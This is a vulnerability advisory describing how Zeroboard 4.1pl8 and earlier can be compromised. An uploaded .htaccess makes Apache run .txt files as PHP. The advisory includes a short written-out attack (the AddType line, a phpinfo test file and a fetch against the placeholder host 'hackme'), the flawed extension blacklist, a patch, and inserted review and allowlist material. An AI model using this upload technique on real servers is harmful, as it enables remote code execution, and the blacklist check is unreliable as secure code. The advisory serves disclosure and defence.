Zeroboard File Upload & extension bypass Vulnerability 

Author : Choi Min-sung (mins __at__ wins21.com)

Product : Zeroboard  http://www.nzeo.com

Vendor-Patches : Unpatched

Impact : remote code execution




Summary

=======


Zeroboard prohibits uploading PHP, HTML, and CGI files. However, uploading
other files that can modify the Apache configuration, such as .htaccess, is
not treated as a serious issue and is not blocked. An attacker can therefore
execute arbitrary code on the system and take control of it.



Affected Products

=================


* Apache servers whose httpd.conf sets AllowOverride FileInfo or
AllowOverride All, which allows file types to be changed from .htaccess.

* Zeroboard 4.1pl8 or earlier



Details

=======


Zeroboard prohibits uploading executable scripts such as php, html, cgi,
and asp.


write_ok.php 

------------

// Upload prohibited
if($file1_size>0) {
$s_file_name1=$file1_name;
if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)
||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)
||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML and PHP related files cannot be uploaded.");



However, the code above does not block the upload of files such as .htaccess.
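An allowlist-based filename check that rejects the dotfile and .txt uploads this advisory describes, shown as an added example (it is not Zeroboard's code and not the author's patch). The function name safe_upload_name and the extension list are assumptions chosen for illustration.

```php
<?php
// Added example, not Zeroboard code. The allowlist below is an assumption;
// set it to the file types the board actually needs to accept.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'zip'];

/**
 * Returns a server-generated storage name for an accepted upload,
 * or null when the client-supplied name must be rejected.
 */
function safe_upload_name(string $clientName): ?string
{
    // Drop any path component and surrounding whitespace first.
    $name = trim(basename(str_replace('\\', '/', $clientName)));

    // Reject empty names and dotfiles such as .htaccess.
    if ($name === '' || $name[0] === '.') {
        return null;
    }

    // Require exactly one extension and require it to be on the allowlist.
    // mod_mime looks at every extension of a multi-extension name, so names
    // with more than one dot-separated suffix are rejected as well.
    $parts = explode('.', strtolower($name));
    array_shift($parts);
    if (count($parts) !== 1 || !in_array($parts[0], ALLOWED_EXTENSIONS, true)) {
        return null;
    }

    // Never store under the client's name: a random name cannot collide
    // with server configuration files or with existing uploads.
    return bin2hex(random_bytes(16)) . '.' . $parts[0];
}

// Constructed sample names, including the two from this advisory.
foreach (['photo.jpg', '.htaccess', 'test.txt', 'notes.php.jpg', 'report.PDF'] as $n) {
    printf("%-14s => %s\n", $n, safe_upload_name($n) ?? 'rejected');
}
```

Only photo.jpg and report.PDF are accepted, and both are stored under a random name with a lowercase extension.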



The Process of an Actual Attack 

=============================== 

- Attack Scenario 


1. A malicious user uploads the following '.htaccess' file.


.htaccess 

--------- 

AddType application/x-httpd-php .php .php3 .php4 .htm .html .txt 


2. A malicious user uploads the following .txt file.

test.txt 

-------- 

<? phpinfo(); ?>


3. The PHP script is executed, because the uploaded .htaccess makes Apache
handle .txt files as PHP.


$ lynx --dump http://hackme/zb41pl7/bbs/data/test/test.txt 



Solution

========


Below is an informal patch that I made. 

Vendor Proceed -> Unpatched 


write_ok.php.patch 

------------------ 

--- write_ok.php.org 2005-09-01 19:22:17.000000000 +0900 

+++ write_ok.php 2005-09-01 19:22:27.000000000 +0900 

@@ -208,7 +208,7 @@ 


// Upload prohibited 

if($file1_size>0) { 

$s_file_name1=$file1_name; 

- 
if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)


||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)


||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML 
and PHP related files cannot be uploaded."); 


+ 
if(preg_match("/^\./",$s_file_name1)||eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi


("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi


("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1))
 Error("The 


HTML and PHP related files cannot be uploaded."); 


//Check extension 

if($setup[pds_ext1]) { 
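
Review bot: The added preg_match("/^\./",$s_file_name1) on the + line only rejects a name whose very first character is a dot, so it relies on $s_file_name1 already being a bare, normalised filename; apply it to basename(trim($s_file_name1)) so that assumption is enforced here rather than inherited. The rest of the condition is still the same substring blacklist, so any extension not listed continues to upload; an allowlist of permitted extensions, which the $setup[pds_ext1] check in the trailing context appears to be the place for, together with AllowOverride None on the upload directory, would fix the cause rather than this one filename. The Error() text also still mentions only "HTML and PHP related files", which will not explain a rejected dotfile to the user.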



Timeline

========

01/09/2005 Initial vendor notification. I made a temporary patch.

02/09/2005 Vendor confirms vulnerability.

15/03/2006 Patch 4.1pl8 released (THIS VULNERABILITY WAS NOT PATCHED)

12/06/2006 Vulnerability reported to KISA (Korea Information Security Agency) KRCert

12/06/2006 Final Vendor Contact.

12/06/2006 Secunia notified of this vulnerability.

16/06/2006 Public disclosure.

 

Credits  

=======

Discovered by  Choi Min-sung, WINSTechnet CERT

 


Reference Site  

==============

http://securecast.wins21.com/zerovul.html

http://securecast.wins21.com/offer/offer_database_view.asp?code=WE06-0391 
